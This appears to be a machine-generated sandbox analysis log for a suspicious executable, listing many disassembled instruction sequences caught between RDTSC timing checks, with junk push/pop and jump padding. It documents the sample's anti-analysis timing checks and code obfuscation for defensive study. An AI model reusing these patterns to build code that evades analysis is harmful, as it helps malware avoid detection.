Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB138B second address: BB1391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1391 second address: BB13B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FD934C45616h 0x0000000f jmp 00007FD934C45628h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB13B9 second address: BB13E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD934BC97DFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1705 second address: BB1720 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1720 second address: BB1724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB1724 second address: BB1775 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FD934C45616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FD934C45625h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FD934C45629h 0x0000001e pushad 0x0000001f jo 00007FD934C45616h 0x00000025 push eax 0x00000026 pop eax 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB19E7 second address: BB19EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB657D second address: BB6582 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB6582 second address: BB6599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD934BC97E0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B173D9 second address: B173EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD934C45616h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B173EA second address: B173F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9657 second address: BB967A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45629h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB967A second address: BB967F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB967F second address: BB96C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD934C45618h 0x00000008 jne 00007FD934C45618h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD934C45624h 0x00000017 jmp 00007FD934C45627h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9934 second address: BB993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB993C second address: BB9942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9942 second address: BB9947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9947 second address: BB9960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934C4561Eh 0x00000008 js 00007FD934C45616h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9960 second address: BB997A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934BC97E1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB997A second address: BB997E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9D7A second address: BB9D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9D80 second address: BB9D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC0ED3 second address: BC0EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934BC97E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC0EEF second address: BC0EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC11C8 second address: BC11CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC11CD second address: BC11F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FD934C45618h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD934C45623h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC14C7 second address: BC14E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC14E9 second address: BC14F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC14F1 second address: BC14F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC17B7 second address: BC17BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC17BB second address: BC17E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD934BC97E1h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FD934BC97DEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC17E6 second address: BC180B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934C45616h 0x00000008 jmp 00007FD934C45627h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC180B second address: BC1815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1815 second address: BC1819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1819 second address: BC1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1823 second address: BC1840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45629h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1AEC second address: BC1AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1AF5 second address: BC1AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1AFB second address: BC1AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC22DB second address: BC22E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC2A10 second address: BC2A1A instructions: 0x00000000 rdtsc 0x00000002 je 00007FD934BC97D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC98A4 second address: BC98A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF4B second address: BCBF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD934BC97D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF57 second address: BCBF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45625h 0x00000009 popad 0x0000000a ja 00007FD934C45618h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF80 second address: BCBF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF84 second address: BCBF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68B2 second address: BD68B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68B8 second address: BD68BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68BC second address: BD68F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FD934BC97D6h 0x00000010 jmp 00007FD934BC97E5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68F1 second address: BD6911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD934C45623h 0x0000000c jns 00007FD934C45616h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B0134A second address: B01386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD934BC97E7h 0x0000000e jmp 00007FD934BC97E8h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B01386 second address: B0138C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B0138C second address: B013AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B013AA second address: B013AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BDB0A9 second address: BDB0DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E4h 0x00000007 jmp 00007FD934BC97E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BDB0DE second address: BDB0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BDB0E4 second address: BDB0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAA0 second address: BEDAB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934C45616h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAB2 second address: BEDAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAB6 second address: BEDAD6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934C45616h 0x00000008 jne 00007FD934C45616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD934C4561Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAD6 second address: BEDADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDADB second address: BEDAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C4561Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF421B second address: BF4242 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD934BC97E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FD934BC97F3h 0x00000010 pushad 0x00000011 jnc 00007FD934BC97D6h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF43C3 second address: BF43C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF43C9 second address: BF43D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF43D1 second address: BF43D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF6DCD second address: BF6DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BFBCBE second address: BFBCC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BFBCC7 second address: BFBCCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BFB89C second address: BFB8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD934C45618h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FD934C45620h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BFD208 second address: BFD20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BFD20C second address: BFD216 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: C37E73 second address: C37E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: C37E79 second address: C37E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FD934C4561Fh 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: C37E96 second address: C37EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934BC97DBh 0x00000008 jnl 00007FD934BC97D6h 0x0000000e jbe 00007FD934BC97D6h 0x00000014 jbe 00007FD934BC97D6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FD934BC97DAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: C37EC5 second address: C37EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: C4A624 second address: C4A653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD934BC97E1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: C4A653 second address: C4A657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D13DCC second address: D13DD8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD934BC97DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D12D97 second address: D12D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D12D9D second address: D12DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D12DA5 second address: D12DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD934C4564Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D12DB5 second address: D12DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D12F79 second address: D12F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D137DF second address: D13803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FD934BC97D6h 0x00000010 jmp 00007FD934BC97E1h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D1392F second address: D13936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D16976 second address: D16980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D16980 second address: D16984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D16984 second address: D169A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FD934BC97E4h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D169A5 second address: D16A05 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD934C45629h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+1244EDE3h] 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD934C45618h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D29EAh] 0x00000033 push 89447FBAh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FD934C45621h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D16A05 second address: D16A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D16A0B second address: D16A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D16A0F second address: D16A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D19B48 second address: D19B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: D19B4E second address: D19B54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
